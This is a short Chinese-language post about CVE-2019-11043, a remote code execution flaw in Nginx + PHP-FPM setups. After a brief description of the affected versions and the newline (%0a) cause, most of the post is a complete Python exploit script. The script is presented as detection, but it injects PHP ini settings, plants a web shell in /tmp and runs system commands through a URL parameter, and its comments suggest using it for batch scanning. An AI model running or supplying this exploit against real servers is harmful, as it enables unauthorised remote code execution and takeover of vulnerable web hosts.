CVE-2019-11043
CVE-2019-11043 是一个PHP远程代码执行,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在,可允许远程执行代码。该存在于php上。Nginx在0.7.31之后版本才存在fastcgi_split_path_info这个指令。另外经过poc验证,php5.4版本未受影响,php5.6以上版本会服务崩溃,php7.0以上版本可以执行远程命令执行。**2.概述类型:**远程代码执行。
**利用条件:**nginx配置了fastcgi_split_path_info
**受影响系统:**PHP 5.6-7.x,Nginx>=0.7.31
Nginx与 php-fpm 服务器上存在远程代码执行,由于Nginx的fastcgi_split_path_info模块在处理带%0a的请求时,fastcgi_split_path_info指令中的Regexp被破坏。Regexp被损坏导致对换行符 \n 处置不当使得将 PATH_INFO 值置为空,从而导致 php-fpm 在处理 PATH_INFO 时存在,通过精心的构造和利用,可以导致远程代码执行。
检测:
import requests # author:eth10 # 根据GitHub上面的go语言exp,以及攻击数据包写的对应py3 exp # 随便改一下就可以批量检测了,检测之前最好确认是nginx+linux+php的环境 # url必须是带有php的文件路径,如:http://192.168.1.11/index.php # 第一次的话在攻击过程中可以利用,但是结束后可能就不稳定了,建议第一次执行完之后,再执行一次稳定后就可以执行命令了。 # 访问即可执行命令:http://192.168.1.11/index.php?a=ifconfig url = input("URL:") url = url.strip() def one(): tmplist = [] headers = {"User-Agent": "Mozilla/5.0", "D-Pisos": "8=D", "Ebut": "mamku tvoyu" } for i in range(1499, 1900): res = requests.get(url + "/PHP%0Ais_the_shittiest_lang.php?" + "Q" * i, headers=headers) if res.status_code == 502: tmplist.append(i-10) tmplist.append(i-5) tmplist.append(i) print(f"Status code 502 for qsl={tmplist[0]}, adding as a candidate") print(f"The target is probably vulnerable. Possible QSLs: {tmplist}") break return tmplist def two(): tmplist = one() if len(tmplist) == 0: print('暂未发现漏洞') return None for i in tmplist: for j in range(1, 256): headers = { "User-Agent": "Mozilla/5.0", "D-Pisos": f"8{'='*j}D", "Ebut": "mamku tvoyu" } res = requests.get(url + "/PHP_VALUE%0Asession.auto_start=1;;;?" + "Q" * i, headers=headers) if "Set-Cookie" in res.headers: # print(i, j, res.headers) print('Trying to set "session.auto_start=0"...') for t in range(50): res = requests.get(url + "/PHP_VALUE%0Asession.auto_start=0;;;?" + "Q" * i, headers=headers) print('Performing attack using php.ini settings...') count = 0 for l in range(1000): res = requests.get( url + "/PHP_VALUE%0Ashort_open_tag=1;;;;;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i-27), headers=headers) res = requests.get( url + "/PHP_VALUE%0Ahtml_errors=0;;;;;;;;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i - 27), headers=headers) res = requests.get( url + "/PHP_VALUE%0Ainclude_path=/tmp;;;;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i - 27), headers=headers) res = requests.get( url + "/PHP_VALUE%0Aauto_prepend_file=a;;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i - 27), headers=headers) # print('auto_prepend_file=a', res.text) res = requests.get( url + "/PHP_VALUE%0Alog_errors=1;;;;;;;;;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i - 27), headers=headers) res = requests.get( url + "/PHP_VALUE%0Aerror_reporting=2;;;;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i - 27), headers=headers) print(l, 'error_reporting=2', res.content) # if "/usr/bin/which" == res.text res = requests.get( url + "/PHP_VALUE%0Aerror_log=/tmp/a;;;;;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i - 27), headers=headers) res = requests.get( url + "/PHP_VALUE%0Aextension_dir=%22%3C%3F=%60%22;;;?a=/bin/sh+-c+'which+which'&" + "Q" * (i - 27-5), headers=headers) res = requests.get( url + "/PHP_VALUE%0Aextension=%22$_GET%5Ba%5D%60%3F%3E%22?a=/bin/sh+-c+'which+which'&" + "Q" * ( i - 27 - 5-3), headers=headers) if "PHP Warning" in res.text: # print('extension=%22$_GET', res.text) for k in range(5): res = requests.get( url + "/?a=%3Becho+%27%3C%3Fphp+echo+%60%24_GET%5Ba%5D%60%3Breturn%3B%3F%3E%27%3E%2Ftmp%2Fa%3Bwhich+which&" + "Q" * ( i - 97), headers=headers) if "PHP Warning" in res.text: # print('a=%3Becho+%27%3C%3Fphp+echo', res.text) break break two()
利用工具在Github上面,具体原理需要下溯到底层的.c文件中。
